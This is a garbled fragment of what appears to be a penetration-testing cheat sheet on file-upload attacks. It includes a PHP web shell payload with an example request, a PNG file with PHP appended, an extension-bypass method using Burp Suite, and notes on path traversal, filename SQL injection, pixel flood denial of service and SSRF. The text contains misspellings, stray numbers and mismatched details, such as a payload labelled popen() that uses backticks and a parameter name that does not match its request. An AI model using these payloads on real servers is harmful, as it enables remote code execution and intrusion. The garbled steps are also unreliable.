and Observe that witch PHP functions popen()system(), shell_exec(), passthuru() were disabled and enabled this php Application
Craft Reverse Shell payload with that PHP function and save it into the file name shell.php if client-side validation to bypass it Shell.php.jpg
intercept the file upload request in burpsuite and removed the .jpg extension and forwarded the file upload request to the server.
Pyload with that popen() PHP function:
---------
<?php$cmd = $_GET['cmd'];echo `$cmd`;?>
/uploadform/uploads/shell.php?code=echo%20%60id%60
2
File Upload and Path traversal to RCE
Upload using any attachment upload function png file, containing php code at its end. You can use the file png-transparent.png from the attachments. It is an empty PNG file with the following payload at its end:
<?php system("uname -a");?>
resend it modifying Filename with the system relative path to the uploaded file:
We can test for SQLi by using the filename as sleep(10)-- -.jpg and uploading the file. Once the file is uploaded, if the application shows a delay of mentioned time, the application is vulnerable to SQLi.
Observe the server's response after uploading the generated file.
Confirm that the application can be accessed using another device. If the server takes too long to respond or is inaccessible, the application may be vulnerable to pixel flood attacks.
6
File Upload to SSRF:
Server-Side Request Forgery by using a file upload functionality that allows HTML or SVG files, using a URL, or by using various components. The SSRF may be internal, cloud-based, or simply external based on the situation.
